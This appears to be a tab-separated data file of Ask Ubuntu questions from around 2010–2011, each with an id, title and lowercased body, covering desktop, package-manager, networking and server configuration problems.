36048	how to have separated but vinculated multiple ubuntu one accounts ?	i would like to use 1 account for keeping private files synchronised and another for business files , which will be read by others . i have different e-mail addresses for business and private . the private arrangement is between home , office and laptop . the business arrangement is between these plus business partners . i have tried setting up this arrangement but my efforts are not successful . is thus possible ? if so , how do i instruct the ubuntu one manager which folder should be synchronised in which account ?
36049	clone user profile	is there any reasonable way to copy user profile with all settings ( firefox , thunderbird , netbeans , git , fonts etc . ) to have it as a base for another profile , so i did n't have to set up everything from the beginning ?
36058	turn off international characters when i use alt-shift- [ character ]	whenever i press ( right alt ) -shift and a key i get an international character for that key , for example , alt-shift-s gives š and alt-shift-y gives û how do i turn this off ? i normally use this combo a lot when coding in eclipse so it 's quite annoying that i ca n't use it . i have turned off the compse key in system- > preferences- > keyboard , then layouts- > options in fact everything is disabled in that area . ubuntu 10.10 and asus laptop .
36062	folder shared from unknown user	a friend shared a folder to me , but , when i have accepted the sharing , i can see the folder and the files , but ubuntu one indicate the folder are shared from `` unknown user '' . my friend have setted up the name correctly in his profile .
36063	ubuntu server installation command mode - cfdisk command not found	i 'm trying to install ubuntu 10.04 server with lvm+raid . however , when i use cfdisk command to create new partition , i received the message : /bin/sh : cfdisk : not found . please advise me . thanks .
36066	package manager error : setting up language-selector-common	i 'm using ubuntu 10.04 and i wanted to install python-setuptools package . so i did a sudo apt-get install python-setuptools in the command line and it downloaded the package and went on to the configuration step . however , package manager gave some error messages in the console while python-setuptools were installing , which was this . selecting previously deselected package python-setuptools . ( reading database ... 146674 files and directories currently installed . ) unpacking python-setuptools ( from ... /python-setuptools_0.6.14-3ubuntu1_all.deb ) ... setting up language-selector-common ( 0.6.7 ) ... dpkg : error processing language-selector-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of language-selector : language-selector depends on language-selector-common ( = 0.6.7 ) ; however : package language-selector-common is not configured yet . dpkg : error processing language-selector ( -- configure ) : dependency problems - leaving unconfigured setting up python-setuptools ( 0.6.14-3ubuntu1 ) ... no apport report written because the error message indicates its a followup error from a previous failure . processing triggers for python-central ... errors were encountered while processing : language-selector-common language-selector e : sub-process /usr/bin/dpkg returned an error code ( 1 ) according to the output , i figured that python-setuptools was correctly installed . but what are the other errors it reporting ? any insight will be highly appreciated . thanks in advance .
36072	i want to know about ubuntu basics : shell , command etc about ubuntu . help !	i 'm new to ubuntu and i want to know some basics about ubuntu/linux , because i do n't understand command line , shell , etc . would anyone please explain about ubuntu shell , command and what 's the meaning of ppa and repositories in applications package ? . i 'd be glad if you want to answer my question here or to ferradellia @ gmail.com . i love ubuntu since 3 days ago when i migrated a new operating system to linux and i think ubuntu is the best for beginners like me . but i have to learn more about linux cuz this one is so different and more fun than windows . thx ... thx !
36076	moving files to /dev/shm ramdisk does n't increase ram usage ?	i 've been wanting to make us of a ramdisk on my ubuntu system for a while , and have done a bit of reading online . most of the advice centres around using /dev/shm to move files into ram . i wanted to try this out so i copied six 1gb files to /dev/shm , but according to gnome-system-monitor my ram usage did not budge above 1.4gb . is this how /dev/shm operates , or is there something else i need to do/use to ensure that files are stored in ram and not on the hdd . the reason i 'm after the ramdisk is to speed up the analyses i run on this machine . currently it uses at most about 1.6gb of the 24gb installed in the machine , and all that extra ram doing nothing seems a bit of a shame .
36083	not detecting any wireless	i just installed 10.10 on dell , http : //www.ubuntu.com/certification/hardware/201011-6891 along with widows 7 . however it does not detect any wireless , so i am not able to connect to internet . wireless works on windows 7 . i have added my wireless connection but it does not work either . if i connect a cable , it works through auto eth0 . what is wrong and how can i fix the problem ? thanks in advance .
36088	how to fetch the code of the binary installed on a machine ?	i am a newbie in linux and using ubuntu as my desktop os . most of the time i feel the need to look at the code of the utility like ls , rm etc . can anyone tell me how to get the code for these utilities . currently i am looking for the implementation of ssh-copy-id utility .
36090	how to add gimp configuration for xmonad ?	i 've used a xmonad.hs like this for months without any issues . import xmonad import xmonad.hooks.dynamiclog import xmonad.hooks.managedocks import xmonad.util.run ( spawnpipe ) import xmonad.util.ezconfig ( additionalkeys ) main = do xmproc < - spawnpipe `` /usr/bin/xmobar /home/stephen/.xmobarrc '' xmonad $ defaultconfig { managehook = managedocks < + > managehook defaultconfig , layouthook = avoidstruts $ layouthook defaultconfig , modmask = mod4mask -- rebind mod to windows key } `additionalkeys` [ ( ( mod4mask .| . shiftmask , xk_z ) , spawn `` gnome-screensaver-command -- lock '' ) ] now i 'd like to add some config to better handle gimp , i found this one but i 'm not sure how to combine it with my current config . how do i do that ? or is there a better way to configure xmonad to play nicely with gimp ?
36092	many of my signatures/public keys for my repos dissappeared !	here is a story of a demented ubuntu install . one day , after being installed , loved and showing other oses who 's boss it decided to remove many of it 's stored signatures/public keys - all on it 's own ! the ubuntu install coped well but it 's user found it difficult to work around when trying to apt-get update . if it was possible to update without the verification it 's user decided to give it a go ( acknowledging the risks ) and.. well they both knew this was no way to go on . so - to the internet , where all the other ubuntu users reside ! breaking narrator character for a moment the last apt-get update i ran gave this set of errors : w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //gb.archive.ubuntu.com maverick release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures could n't be verified because the public key is not available : no_pubkey 61e091672e206ff0 w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //ppa.launchpad.net maverick release : the following signatures were invalid : badsig 9dad42d740c11e40 launchpad cloudsn reporitory w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //ppa.launchpad.net maverick release : the following signatures were invalid : badsig b725097b3acc3965 launchpad lffl w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures could n't be verified because the public key is not available : no_pubkey 6d3b959722e58263 w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/maverick/release w : failed to fetch http : //ppa.launchpad.net/chuchiperriman/cloudsn/ubuntu/dists/maverick/release w : failed to fetch http : //ppa.launchpad.net/ferramroberto/vlc/ubuntu/dists/maverick/release w : failed to fetch http : //nightlies.videolan.org/build/intrepid-i386/arch/./packages.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/nilarimongard/webupd8/ubuntu/dists/maverick/main/source/sources.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/nilarimongard/webupd8/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found w : some index files failed to download , they have been ignored , or old ones used instead . i have read on ubuntuforums that i can go through each missing sig/key one-by-one and get it back . this seems quite long winded as a solution . is there a line of code to automatically find any and all missing keys ? or am i doomed to dig through these manually to become happy-ever-after ?
36095	alias for virtual host using apache2	i am attempting to set up the lamp environment for the first time . i normally use windows and just install xampp . i have followed the instructions on ubuntu forums and have duplicated the file in sites-available . currently i can access my site via localhost , but not via either the servername or serveralias directive . here is the file in sites-avialable : < virtualhost *:80 > servername www.example.com serveralias www.example.com serveradmin webmaster @ localhost directoryindex index.php documentroot /home/username/example < directory /home/username/example > options followsymlinks allowoverride none < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined serversignature on < /virtualhost >
36098	link key to a bash script	i 'm trying to link a button ( now without function ) to a bash script that i have made on ubuntu . i 'm using a clevo w150hnm/sager np5160 i want to use 1 or 4 for this ( see photo on http : //i.stack.imgur.com/lueyo.jpg ) i do n't get any output of xev , getscancodes or cat /dev/input/eventx when pressing this key . how can i use this key to run the script ? many thanks simon
36100	is it safe to install virtualbox for 10.10 in 11.04 ?	is it safe to install virtual box ( for maverick ) on natty beta 2 ? i would like have windows in virtualbox and i upgraded my maverick to unity . but virtualbox has not released a version for natty yet .
36111	what 's a command line way to find large files/directories to remove and free up space ?	looking for a series of commands that will show me the largest files on a drive .
36113	how to log off an user from ssh ?	i am able to see logged-in users via the who or last command . how can i log off a particular user who login through ssh ?
36115	repo errors when doing apt-get update	this question is posted as a follow on the the missing gpg keys q i posted here : many of my signatures/public keys for my repos dissappeared ! here is the output when trying to apt-get update : err http : //ppa.launchpad.net maverick/main sources 404 not found err http : //ppa.launchpad.net maverick/main i386 packages 404 not found get:10 http : //dl.google.com stable release [ 1,347b ] get:11 http : //dl.google.com stable/main i386 packages [ 470b ] get:12 http : //dl.google.com stable/main i386 packages [ 737b ] fetched 5,749b in 12s ( 445b/s ) w : gpg error : http : //gb.archive.ubuntu.com maverick release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures were invalid : badsig 61e091672e206ff0 launchpad nautilus-elementary w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures were invalid : badsig 9dad42d740c11e40 launchpad cloudsn reporitory w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures were invalid : badsig b725097b3acc3965 launchpad lffl w : failed to fetch http : //nightlies.videolan.org/build/intrepid-i386/arch/./packages.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/nilarimongard/webupd8/ubuntu/dists/maverick/main/source/sources.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/nilarimongard/webupd8/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . i 'm not sure how or why these errors have come about or how to fix . any help appreciated .
36117	ubuntu one on lubuntu ?	is it possible to sync a ubuntu computer with a lubuntu computer with ubuntu one ? can you install ubuntu one on lubuntu with no problems ?
36120	why dash is too dark ?	i ca n't get to view the running apps behind the dash ...
36121	link button to script	i 'm trying to link a button ( now without function ) to a script that i have made . i 'm using a notebook with several extra buttons this button however is like the power on button , it stands by itself and is not part of my keyboard . i do n't get any output of xev , getscancodes or cat /dev/input/eventx when pressing this button . how can i use this button to run the script ? many thanks simon
36125	update manager error : failed to fetch	w : failed to fetch http : //ppa.launchpad.net/ubuntu-desktop/gnome3-builds/ubuntu/dists/maverick/main/source/sources.gz 404 not found , w : failed to fetch http : //ppa.launchpad.net/ubuntu-desktop/gnome3-builds/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead . every time i try to run update manager and check for new updates , this error message appears . obviously this has some thing to do with the gnome3-shell i downloaded about a week earlier . is these download links have been moved elsewhere or deprecated or something like that ? any idea on how to fix this ? thanks in advance . p.s : - i 'm running maverick meercat
36126	where are sound themes located ?	where are sound themes located ?
36129	ca n't install ubuntu 10.10	i have quite a specific problem with ubuntu installation ( 10.10 , 64bit ) . i have a hard drive , say /dev/sda where 32 bit ubuntu 10.10 had been installed on sda1 . i removed this installation with mkfs and now this partition is clean . i burned a start-up ubuntu disc and i am trying to install it . for some strange reasons ubuntu installer mounts this drive as /cdrom and i ca n't go on with the instalation because 'it can not be unmounted '' and `` partition table can not be altered '' i do n't want to repartition the hdd neither to format anything . the only changes i introduced to the partition table within the installer was to set up mounting points . so how to install ubuntu in this case ? i 've tried a lot of different things , e.g . it does n't help to move the hdd to another controller . so even if /dev/sda is a clean new hdd and /dev/sdb is the hdd of interest , the stupid installer still mounts it ( now /dev/sdb ) so i did another experiment : i put a third hdd into the machine . now it looks as follows : /dev/sda1 - 1tb ( irrelevant hdd with ext3 partition ) /dev/sdb1 - 1tb with another ubuntu 10.10 32 bit installation /dev/sdc1 - 1tb the hard drive , where ubuntu 10.10 32 bit used to be installed unfortunately even now the installer says `` your installation medium is /dev/sdc1 '' why ? why there but neither on /dev/sda1 nor on /dev/sdb2 ? ? ? although now i have 3 hdds , i ca n't play too much with them , because : /dev/sdb1 holds my backup of /dev/sda1 /dev/sdc1 is borrowed from another machine and i do n't want to have yet another problem with ubuntu installation ( when i would mess up /dev/sdc1 ) i also need to keep partition table on the target drive because there are other partitions there with users ' data
36130	can i resize the unity panel ?	in 11.04 , how do i resize the panel ? i right-click , but nothing happens ?
36135	with unity , evolution calendar alarms are not persistent . how can i make them so ?	i use alarms attached to events in my evolution calendar . with unity , i get the usual notification at the appropriate time , but unlike in 10.10 or previous versions , there is no persistent reminder of the event ( no 'alarm clock ' icon in the system tray ) . what can i do to get a persistent reminder of the event ? something needs to turn blue in that panel ! ( in my opinion , that should be the date and time . ) if someone could suggest any easy way of setting a persistent visual reminder , that would be great .
36140	used hyper-v to create a ubuntu vm and vhd is showing 1/8 the capacity	my ubuntu vm is configured with a 1 terabyte vhd . the physical machine uses a raid-5 8-disk hard drive . when i log in to the ubuntu vm , it only shows about 1/8 of the storage the vhd is configured for . i 'm using hyper-v to create the vm . i 'm thinking it has to do with raid-5 , since there are 8 disks and i am seeing 1/8 of the capacity . is there anyway to check to be sure it is n't just unpartioned and not available ? ? i 've been trying to figure this out for three days ! eric @ slash : ~ $ discus mount total used avail / 120.36 gb 949.3 mb 119.43 gb /sys 0 kb 0 kb 0 kb connections 0 kb 0 kb 0 kb +rnel/debug 0 kb 0 kb 0 kb +l/security 0 kb 0 kb 0 kb /dev 3.90 gb 152 kb 3.90 gb /dev/shm 3.90 gb 0 kb 3.90 gb /var/run 3.90 gb 44 kb 3.90 gb /var/lock 3.90 gb 0 kb 3.90 gb +ad/debugfs 120.36 gb 949.3 mb 119.43 gb
36141	frequent cpu hogging	i am using ubuntu for 4 months . i am starting to notice that , my cpu usage is becoming 100 % very frequently and my system becomes unresponsive . i do n't run any cpu intensive tasks , just nautilus , transmission , vlc , pidgin , firefox and chrome . i suspect , chrome and firefox are responsible for cpu hogging . what can i do ? ubuntu 10.10 firefox 4.0 google chrome 10 stable pc configuration : intel core2duo 2.53ghz ram 3gb is there any command that kills most cpu using process ?
36142	how do i remove a repository from the terminal ?	i have a banshee link that is wrong and i need to remove it , how do i do it from the terminal ? i have the incorrect link , i have the correct one as well .
36151	is it possible to install without using the graphical installer ?	the graphical installer does not work . after i typed in my information , it showed the slideshow to me , but did n't install ubuntu .
36159	lost files on my ubuntu cloud	my folder on the cloud has disappeared is there a way to get it back ?
36162	how do we create users on uec ?	i have setup clc , cc , sc and walrus on one machine and its running fantastic , but as admin . can we create user on this cloud ? and if we can how ?
36163	how can i reset compiz to the default settings ?	i 've got a bug that is reoccuring ( no window chrome close/minimize/maximize buttons ) that is solved by changing the visual effects level ( e.g . from none to normal ) . unfortunately , the desktop is relatively unusable until i change that setting upon each login . i have the inclining that it might be solved by resetting compiz to it 's default settings . how would i go about resetting compiz ( or whatever is in charge of those visual effects ) to it 's defaults ?
36168	how can i get compose back on ibus ?	i ca n't seem to get compose in ibus since i upgraded to natty , and the unicode option does n't cut it . i can not enter custom latin characters with the unicode option : / . how do i get it back ?
36169	how do i set a network proxy with network manager ?	i am a student and using ubuntu 10.04 and windows 7 as dual boot . in my college , we have a proxy server , so all i need to use the internet is set the proxy settings in preferences - > network proxy and i am set to go . at my home , i have a broadband connection that requires me to enter my username and password and then its all set on windows . however , i have no idea how to get it right with ubuntu . once i tried doing that by setting the pppoe settings and then it worked on ubuntu too , but when i came back to college , the internet stopped working . all i remember is that i did some stuff with setting some network manager stuff to false or something like that , and it continued working with the proxy server too . please help me with this , so that i can easily use internet both at home and college too .
36175	no window manager running by default on boot , what is the best method to ensure one opens cleanly ?	when i start ubuntu ( 10.04 ) , the desktop starts and has windows without their window chrome ( e.g . they do n't have close , minimize , or maximize buttons ) . when i click on the `` show desktop '' icon , the following message pops up : '' your window manage does not support the show desktop button , or you are not running a window manager . '' i can fix this by going to appearance and toggling the visual effects levels to anything different than what they were on . based on the behavior and the message , i expect that the window manager is simply not starting correctly when i boot up . what is the best way to make it do so ? potentially applicable log ( from log viewer ) : apr 20 17:46:09 wintermute acpid : 1 client rule loaded apr 20 17:46:09 wintermute acpid : client connected from 14964 [ 0:0 ] apr 20 17:46:09 wintermute acpid : 1 client rule loaded apr 20 17:46:11 wintermute gdm-simple-greeter [ 15041 ] : gtk-warning : /build/buildd/gtk+2.0-2.20.1/gtk/gtkwidget.c:5636 : widget not within a gtkwindow apr 20 17:46:18 wintermute gdm-session-worker [ 15043 ] : glib-gobject-critical : g_value_get_boolean : assertion `g_value_holds_boolean ( value ) ' failed apr 20 17:46:19 wintermute gnome-session [ 15073 ] : warning : could not parse desktop file /home/tchalvak/.config/autostart/xfconf-migration-4.6.desktop : key file does not have key 'name' apr 20 17:46:19 wintermute gnome-session [ 15073 ] : warning : could not read /home/tchalvak/.config/autostart/xfconf-migration-4.6.desktop apr 20 17:46:19 wintermute gnome-session [ 15073 ] : warning : could not launch application '10b602e69f41694b93125011878472406000000044180035.desktop ' : unable to start application : failed to execute child process `` /usr/bin/compiz.real '' ( no such file or directory ) apr 20 17:46:19 wintermute gnome-session [ 15073 ] : warning : could not launch application 'ubuntuone-client-applet.desktop ' : unable to start application : failed to execute child process `` ubuntuone-client-applet '' ( no such file or directory ) apr 20 17:46:19 wintermute gnome-session [ 15073 ] : warning : could not launch application '10996e0d149c5579e7125021326532307300000045290042.desktop ' : unable to start application : failed to execute child process `` hamster-applet '' ( no such file or directory ) apr 20 17:46:20 wintermute gnome-session [ 15073 ] : warning : could not launch application '10996e0d149c5579e712502132692274200000045290043.desktop ' : unable to start application : failed to execute child process `` fast-user-switch-applet '' ( no such file or directory ) apr 20 17:47:23 wintermute aptdaemon : info : initializing daemon
36181	how can i find out if i am running unity 3d or 2d ?	i am running a natty beta 2 livecd and i realized that by default i booted right into one of the unity desktop environments . i then looked into the additional drivers app to find that i am not running the usual ati proprietary graphics driver ubuntu needs to run at full capacity . based on that i would assume that i am running 2d but i do n't know , how do i find that out for myself ?
36182	why are graphics so slow/jerky/lagged with an ati 4250 ?	never had a problem with maverick , always very fast . i upgrade to natty and the graphics seem to be very lagged . cpu , load , and memory usage is low , all graphics are choppy and lagged though . i have the proprietary driver installed and everything . alt-tabbing takes 3-5 seconds for the dialog to popup , zooming in with compiz zoom makes things very slow . i never had any of these problems with 10.10
36183	how to access apache2 virtual host from virtualbox ( or any vm )	i am running ubuntu 11.04 , i have setup my localhost so i access my sites at site1.local site2.local by setting up virtual hosts and adding entries to my hosts file . i want to test them in ie so i have installed virtualbox with windows . my question is , how can i access site1.local from the virtual machine ?
36184	gnome main menu ; remove arrow	is there any way to easily remove the dropdown arrow when using the gnome menu in ubuntu 10.10 or 11.04 ? i do n't want to need to recompile the panel or anything messy unless i need to . just to clarify , it 's one of the two gnome menus available by default on ubuntu . the arrow looks gross : (
36194	how can i assign super key + up / down to volume up/down ?	i 've had this mapped for years and it 's very convenient . now i find after installing natty even though it 's still defined in keyboard shortcuts , the key bindings do n't work anymore as the unity bar seems to steal it . any ideas ?
36196	theme changed by itself	all of a sudden by theme was changed to how some old ubuntu version looks like & then i was returned to my theme except all icons , and right click context menus , and how nautilius looks . i think only panels have the same look like before , all others have changed . title bar was gone too . i run compiz and i fixed it by running gtk-window-decorator âreplace last line in my .xsession-errors is ( nautilus:1756 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed what should i do to fix it now ? setting it in the themes did n't do any good as if its files went missing .
36197	can you disable notifications on ubuntu one sync ?	in natty , ubuntu one gives a notification every time it syncs , and i have my empathy logs synced , so now every time i write or recive an im i get a notification that the logs have been synced . is it possible to turn that off , just for ubuntu one ?
36200	how to debug upstart scripts ?	for some reason i 'm getting an error during apport upgrades , the cause of which is % sudo service apport start start : job failed to start under sysvinit , i could debug this kind of problem by running eg sudo sh -x /etc/init.d/whatever start but that does n't seem to map over to upstart . what should i try next ? update : it turns out there is a workaround that will let the install proceed . but i 'm still interested in the general question of how you would trace the script .
36203	how does unity draw the fallback panel window buttons ?	can the images used be changed manually regardless of gtkrc present ? for example , by replacing the images in a folder ?
36204	is there an applet or tool that can show an overview of workspaces ?	are there any existing desktop applets or tools which give a nice overview of the content of workspaces similar to that in the new gnome3 ? similar to this :
36211	undefined reference error _dl_stack_flags with gcc and pthreads	asked on stackoverflow , but the suggested solution involves using gcc 3.4 . question with full details : _dl_stack_flags_error question on stackoverflow however , my ubuntu 10 : wade @ wadesworld : ~ $ uname -a linux wadesworld 2.6.18-194.8.1.el5.028stab070.5ent # 1 smp fri sep 17 19:46:02 msd 2010 i686 gnu/linux only allows gcc 4.1 as a minimum . has anyone seen / solved this problem ?
36212	how do i install the unity books lens , and how do i use it ?	i read that there is a unity book lens available . how do i install it and how do i use it ?
36215	how to get kde cursor	i just installed kubuntu-desktop , everything seems to be working fine and i am enjoying kde . but the cursor is not the default kde one , its the same old gnome cursor . how can i solve this issue .
36217	will third party unity lenses be included in the dashboard search ?	there are already a number of lenses under development . will the search results for these lenses be included in the main unity dashboard search ?
36221	what 's the easiest way to install drupal locally ?	many of the drupal distributions i 've seen are made for earlier versions of ubuntu : drubuntu only works in 10.10 ; the acquia .debs are for < 10.x , and i 've been told the versions in the repos are out-of-date . what 's the easiest way to set up a local testing server for drupal ?
36227	( dual monitors ) indicators displaying in panel on both monitors	the time , power , notification , networking and weather applets are displaying in the panel on both of my monitors in natty . is there a setting that i can change to ensure they only appear once within my top panel ?
36229	can i prevent x from crashing when i unplug my external monitor ?	i have a laptop ( acer travelmate 8471 ) , which i connect to an external monitor , keyboard etc . when i 'm at home . when i unplug my laptop , i have to remember to go to the monitor preferences and turn off the external monitor , and turn on my laptop monitor , otherwise x will crash . when i plug my external monitor to my laptop , it will automatically switch to that one without any troubles . i 'm running 10.10 , and i have an intel graphics card ( gma 4500 i think ; i915 ) .
36235	what is different symbolic link with hard link after unlik ?	1 . # include < stdio.h > # include < unistd.h > void main ( ) { link ( `` foo '' , `` bar '' ) ; unlink ( `` foo '' ) ; if ( open ( `` bar '' , 1 ) < 0 ) printf ( `` open error\n '' ) ; else printf ( `` open succeeded\n '' ) ; } 2 . # include < stdio.h > # include < unistd.h > void main ( ) { symlink ( `` foo '' , `` bar '' ) ; unlink ( `` foo '' ) ; if ( open ( `` bar '' , 1 ) < 0 ) printf ( `` open error\n '' ) ; else printf ( `` open succeeded\n '' ) ; } the result from first code is `` open succeeded '' . and the file `` foo '' is deleted . only remains `` bar '' whose contents is same with the file `` foo '' . the reslut frome second code is `` open error '' . and also only remains `` bar '' . why these results are generated ? 1. especially , although each the hardlink and the symbolic link ( `` bar '' ) points the file `` foo '' , the file `` foo '' was deleted . 2. why `` bar '' is not deletd , after unlink ( `` foo '' ) . unlink function means that it removes the link , which points the specified file . ( this case , `` foo '' ) 3. why result from first code and second code is different ?
36239	`` you do not have the hardware required to run unity '' on vmware	on ubuntu 2010.10 i installed vmware . then i installed the 2011.04beta1 in vmware . evrything worked fine , but after updating packages and rebooting i got the following popup : it seems that you do not have the hardware required to run unity . please choose ubuntu classic at the login screen and you will be using the traditional environment . it opens a session anyway . i have never tried unity but i am pretty sure it opened a plain old gnome session . how can i trick out vmware to support unity ?
36240	how do i get a main menu in unity ?	hi there ! i installed the 11.04 beta2 and i have played with it , for some days . i still miss though a kind of main menu ( gnomenu , mainmemu , what ever ) . is there a way to put an icon of a mainmenu in the unity dash ? thank you for your attention . looking forward to your reply .
36241	how to use my ipod nano 5g ?	i have a 5th generation nano and want to know how i can edit my playlists , add music , remove music , etc . also i read banshee is the default media player for 11.04 , can it handle my question or do i need another app ? also how do i convert a video to the video ipod format ? thanks in advance .
36243	how to checkout using subversion and https	i have just installed subversion and the repository is hosted on assembla . normally when i use windows i just use tortoisesvn and it prompts me for a username and password . when i try to checkout from the terminal i do n't know how to manually specify the username and password and it just freezes when i try to checkout without them ( ca n't ctrl-c the hell outa there ) . here is what i am trying : svn co https : //subversion.assembla.com/svn/comcal/trunk when i was trying to copy the command line just then i got this : svn : server sent unexpected return value ( 502 proxy error ) in response to options request for 'https : //subversion.assembla.com/svn/comcal/trunk'
36245	no keyboard layout indicator ( text ) in the notification area	this question seems to have a long history , but i was somehow unable to find a straightforward answer to it . i am using ubuntu 10.10 with two or three keyboard layouts ( us , ru , de ) . when i first added additional layouts , there appeared a 3-letter code of the layout at the keyboard icon in the notification area , like this ( this is an image from another post ) : however , after some weeks of working with ubuntu , i now have just the keyboard icon , no layout code : i 've no idea why it has disappeared . how can i get it back ? : ) just installed ubuntu 11.04 . in a fresh installation with two layouts , i again have an indicator without doing anything for it . puzzled . btw , in the login screen the layout indicated to the right from the password field is unreadable with the `` flag icons '' suggested as a solution above . with the standard layout indicator , the letters are shown , which is better . so any suggestions as to why the standard layout indicator may disappear are welcome .
36246	getting the pid of the process showing a particular window	i want to know the process id of a particular window . i have seen and used the force close panel applet , and i 'd like something similar that would report me the process id of the window i select . if a tool for this purpose exists , that 'd be great . although , i am willing even to write a simple python script if it can be done . edit : in a more specific case , i want to get the process id of a java swing window . ( the xprop solution some answers suggest is not working ) . thanks .
36249	gedit has an unlisted ctrl-d shortcut which deletes a line . how can i override it ?	in gedit , i installed the line_tools plugin . it uses ctrl+d to duplicate the the current line . when i pressed ctrl+d , it did the opposite ! it deleted the line instead ! it turns out that gedit has an unlisted ( not in the menu ) shortcut-key : ctrl+d , which deletes a line . it is quite simple to change any menu item 's shortcut-key in gedit by enabling editable menu accelerators , but i ca n't change this delete-line action 's key , because there is no menu item for it ! how can i override this delete-line action ? .. and what other unlisted actions does gedit have ? .. and why is it ( they ? ) unlisted ? ps : the developer of the 'line_tools ' provides the plugin with ctrl+d set to 'duplicate'.. i assume he tested it ; which would suggest that there was no such clash circa 2008-01-30 ( the timestamp on the downloaded line_tools.py )
36251	is there a way to change what time the update manager checks for updates ?	i see where to set the frequency ie weekly , daily , etc , but not how to set what time of day it checks .
36252	how can i convert my root partition from btrfs to ext4 ?	is it possible to convert btrfs to ext4 without losing data ? i 'm experiencing a very low speed on read/write operations on btrfs .
36255	why wo n't ssh-agent save my unencrypted key for later use ?	every time i ssh into another server from our headless ubuntu server i am asked for the password to my key file . even if i have previously connected to the server . do you have any idea why this maybe ? it could be something as simple as ssh-agent not currently running or something . the same key on my ubuntu gnome desktop is working fine . both server and desktop are running ubuntu 10.10. ps -ef | grep ' [ s ] sh-agent' simon 3219 1 0 12:46 ? 00:00:00 ssh-agent
36256	annoying clicking noise on asus 1018p , how to turn it off ?	i use ubuntu 10.10 on my asus 1018p . every few second i heare an clicking noise of my hdd . how can i turn it off ?
36259	are daily builds of ubuntu stable enough for general desktop usage ?	are the daily development builds of ubuntu ( known as ubuntu+1 ) stable and mature enough for general desktop usage ? also , if i install the latest daily build today , will it notify for the update of the stable release when ubuntu+1 is officially announced ?
36263	setting up automated offline back-up	i am going to be running an ubuntu server . the server itself will be hosted at a co-location data center . i know how to access it remotely via ssh but i also want to set up a 2nd machine at my business hq for offline backup . i want this machine to backup often at certain times that i can choose ( this time will be the time when i have the least amount of users ) . how would i go about setting this up ?
36266	one monitor doesnt work anymore after standby	i have two monitors connected to my pc . when i restart it from standby my secondary monitor doesnt work anymore . this also happens when i switch to the console and then back to gnome . how could i fix that ?
36268	how do i blacklist the gallium ati driver ?	is there a way to stop the gallium driver loading ?
36272	catalyst control center disables dual screen on login	after setting up dual screen in catalyst , it works fine while logged in . then if i restart , in the gnome login screen it is still working fine . during login there 's some flickering , and now dual screen is disabled ! this is 100 % reproducible with the catalyst version from about a week ago . [ the lack of detail is because i wo n't be back at my desktop for a few days . just hoping this is a known problem with a known solution . ] see also this question
36274	tips and tricks for unity	we have the new unity shell in ubuntu , what are the fun new stuff we need to know or look forward to ?
36276	how to restrict users on changing their wallpapers ?	i do n't want my users to change the system wallpaper . how do i the lock the wallpaper down ? update users are changing wallpaper by right clicking the picture and choosing set as wallpaper . how to restrict this behaviour ? is it possible to remove backgrounds tab from appearance preferences ? if yes how ?
36277	how to remove gnome classic session and associated packages ?	ok have been testing unity and i love it . and i have heard that unity-2d will be fallback session from 11.10 . i would like to make 11.04 the same without breaking the functionality of unity . so i would like to know how can i get just ubuntu ( .i.e . unity ) and unity-2d as session choice in 11.04 and completely remove gnome classic desktop session choice ( if possible ) ? ? what packages shall i purge for this without hindering my desktop experience ? ? by the way i have already installed unity-2d and its quite nice as well .
36284	how to restrict users on accessing my machine through ssh and vnc ?	i dont want other users to access my machine through ssh and vnc.how to restrict this ? as a admin i want to view and access all other system through ssh and vnc . also only for my system ssh access should be enabled , is it possible to do this ?
36287	how to start firefox in fullscreen mode ?	how do i start firefox 4 in fullscreen mode ( the one activated by pressing f11 ) ?
36288	how do i get apt links to work with google chrome	i was reading another question on ask-ubuntu , where i encountered an apt link . intrigued , i clicked on it , expecting my browser to launch the software center , only to get a page saying `` you do n't seem to be running ubuntu '' . browser : google chrome 12.0.742.0 dev the link i clicked on apt.ubuntu.com/p/hardinfo thanks for the help .
36291	wubi install as root user	is it possible to install ubuntu from wubi with the root account ( and have it show up in login screen , unlike when it is made manually with `` sudo passwd root '' ) ?
36292	left ctrl key not working in virtualbox	while running an os in virtualbox on ubuntu 10.10 amd64 , i find the the left control key is not being properly detected . ( the right control key is used by virtualbox , but the left control key should be available . ) this makes programs like emacs , that heavily rely on the control key , not work correctly . searching the internet , i found similar complaints that were fixed in by turning off `` show position of pointer when the control key is pressed '' in mouse preferences . since this is already turned off on my system ( actually in both host and client oss ) , i do n't think this is the problem . my question : is this a bug , a feature or operator error ? thanks .
36293	how can i always show the hover title in expose when using compiz ?	i have expose mode on . when i use expose mode i get the zoom out showing all my windows . this is fine . however , when i hover my mouse over one of those windows i get a title bar of what that window is . is there a way to set it show it always shows the hovering title on all windows and not just when i hover over it ? i have the compiz settings manager installed but did n't see any options in there to turn it on .
36295	change window list back color	i ca n't change the `` windows list '' background color to black ( the same background color of my main panel , in gnome ) ... and the final effect is quite bad ! can anyone know where to change this parameter ? thanks
